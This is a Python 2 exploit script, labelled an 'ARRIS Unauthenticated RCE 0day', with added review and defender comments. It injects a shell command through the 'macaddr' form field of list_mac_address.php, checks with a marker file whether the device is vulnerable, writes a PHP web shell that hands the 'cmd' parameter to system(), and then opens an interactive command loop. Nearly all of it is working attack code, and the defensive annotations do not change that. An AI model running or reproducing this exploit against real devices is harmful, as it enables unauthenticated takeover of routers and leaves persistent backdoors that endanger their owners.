# Python 2 script (print statements, urllib2, cStringIO, raw_input); it does not run under Python 3.
# NOTE(review): `time` is imported twice, and logging, datetime, re, StringIO, colorama's Back
# and the exception names imported from requests are not referenced in the visible code.
import logging, os, time, datetime, re,sys
import requests
import string
import random
import time
import urllib2
# Silences urllib3's InsecureRequestWarning. Every request in this script passes verify=False,
# so TLS certificates are never validated and the warning that would say so is hidden.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from requests import ReadTimeout, ConnectTimeout, HTTPError, Timeout, ConnectionError
print ("")
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
# Initialise colorama so the ANSI colour codes used in the messages also work on Windows consoles.
init()
# Clear the terminal with the platform's own command.
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
# File name of this script, used only in the usage text printed by banner().
piton = os.path.basename(sys.argv[0])
def banner():
	"""Print the banner; when no URL argument was given, print usage and exit.

	Reads the module-level ``piton`` (this script's file name) and colorama's
	``Fore`` colour codes. Returns None when at least one argument is present.
	"""
	print('''
 @---------------------------------------------------------------@
 |                                                               |
 |       ARRIS  - Unauthenticated RCE - 0day      |
 @---------------------------------------------------------------@
          ''')
	# Guard clause: with a target URL on the command line there is nothing more to show.
	if len(sys.argv) >= 2:
		return
	usage_line = '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <url>\n'
	example_line = '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' http://127.0.0.1\n'
	print(usage_line)
	print(example_line)
	sys.exit()
# Show the banner; banner() exits the process when no URL argument was supplied.
banner()
print '\n\x20\x20[*] Starting Exploitation '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
# Target base URL, taken verbatim from the command line with no validation.
host = sys.argv[1]
# Reachability check: a single GET of the base URL, without TLS certificate validation.
# NOTE(review): the request is made with `requests`, but the handlers below catch
# urllib2.HTTPError / URLError, which `requests` does not raise. A failed connection would
# surface as an uncaught requests exception, and a 404 response is not an error for
# requests.get() because raise_for_status() is never called. The response stored in
# `testurl` is not inspected, so the "[OK]" below only means that no exception was raised.
try:
	testurl = requests.get(host, verify=False, timeout=6.0)
	
except urllib2.HTTPError, errorzio:
	if errorzio.code == 404:
		print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
		print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
		print
		sys.exit()
except URLError, errorziocvaj:
	if errorziocvaj.reason:
		print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
		print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
		print
		sys.exit()
print '\x20\x20[*] Connectivity Test '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
# Vulnerability probe. The form field `macaddr` carries a MAC address followed by `;` and a
# shell command that writes a fixed marker string to /var/www/1roksi.txt. The script then
# fetches /1roksi.txt and looks for the marker. No credentials or session cookie are sent
# with either request.
# NOTE(review): presumably the device-side list_mac_address.php passes `macaddr` to a shell
# without validation; the server code is not shown here, so confirm against the firmware.
# Defender notes:
#   - A `macaddr` value that is not exactly six colon-separated hex octets is anomalous for
#     this endpoint; rejecting it server-side (strict pattern match, no shell involved) and
#     alerting on it at a proxy/WAF are the corresponding fix and detection.
#   - The marker file is never removed by this script, so 1roksi.txt in the web root is a
#     host-side indicator that the probe was run against a device.
#   - The management interface answering this POST without authentication is part of the
#     exposure; restricting who can reach it reduces risk until the endpoint is fixed.
c1 = {"macaddr": "00:00:44:00:00:00;echo '83218ac34c1834c26781fe4bde918ee4'>/var/www/1roksi.txt", "action": "0", "settype": "1"}
# The POST response (`s1`) is not checked; only the follow-up GET decides the outcome.
s1 = requests.post(host+"/list_mac_address.php", data=c1, verify=False, timeout=6.0)
# Unlike the POST above, this GET sets no timeout.
lw = requests.get(host+'/1roksi.txt', verify=False)
if "83218ac34c1834c26781fe4bde918ee4" in lw.text:
	print '\x20\x20[*] Target Seems Vulnerable '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
	print
	
else:
	# Marker not found: report and stop (the "[ERR]" tag is printed in green here).
	print '\x20\x20[*] Not vulnerable '+'.'*41+Fore.GREEN+'[ERR]'+Fore.RESET
        sys.exit()
# Second stage: write a PHP file into the device's web root through the same form field.
# NOTE(review): `sh` and `send_stage` are assigned only inside this __main__ guard but are
# read by the unguarded module-level code that follows, and the probe above has already run
# by the time the guard is evaluated, so the guard does not make this file safe to import.
if __name__ == '__main__':
    # Length of the random file name.
    N = 10  
    # File name drawn from A-Z and 0-9 using the `random` module (not a CSPRNG).
    ran = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
    sh = str(ran)+".php"
    # Same `macaddr` injection as the probe; the appended command writes a PHP file under
    # /var/www/ whose body hands the `cmd` query parameter to system().
    # Defender notes: the result is a new .php file with a 10-character A-Z0-9 name in the web
    # root, which the rest of this script requests without credentials. File-integrity
    # monitoring on the web root and alerting on unexpected .php creation cover this step;
    # the file is not removed by this script, so it persists after the session ends.
    lo1={"macaddr": "00:00:44:00:00:00;echo '<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>' > /var/www/"+sh+"", "action": "0", "settype": "1"}
    send_stage = requests.post(host+"/list_mac_address.php", data=lo1, verify=False)
    
    print '\x20\x20[*] Sending Backdoor File '+'.'*39+Fore.GREEN+sh+Fore.RESET
    # Fixed two-second pause before continuing.
    time.sleep(2)
# These two progress messages are printed unconditionally; nothing is verified before them.
print '\x20\x20[*] Starting'+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
# An HTTP 200 from the second POST is treated as success; the script does not check that the
# file was actually created on the device.
if send_stage.status_code==200:
    print Style.DIM+Fore.CYAN+'\x20\x20[*] Exploitation Finish - System PWNED\n'+Style.RESET_ALL+Fore.RESET
    print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to get intercative shell!\n'+Style.RESET_ALL+Fore.RESET
# Waits for ENTER; this runs whether or not the status check above passed.
raw_input()
# Interactive loop: each line typed by the operator is appended to the dropped file's URL as
# ?cmd=<text>, and the response body is printed back.
# Defender notes: every command travels in the query string of a plain GET, so where access
# logging is enabled the web server records requests for a 10-character .php name carrying a
# cmd= parameter; that request pattern is a direct detection and triage artefact.
while True:
	try:
		cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
		execute = requests.get(host+"/"+sh+"?cmd="+cmd, verify=False)
		reverse = execute.text
		print reverse
		
		# The request above has already been sent when this check runs, so typing `exit`
		# still issues one last request before the loop ends.
		if cmd.strip() == 'exit':
            
			break
		
	# Any exception, including a network error, ends the loop without a message.
	except Exception:
		break
print
sys.exit()
                              
                        
                    
                
              
                
             
          
          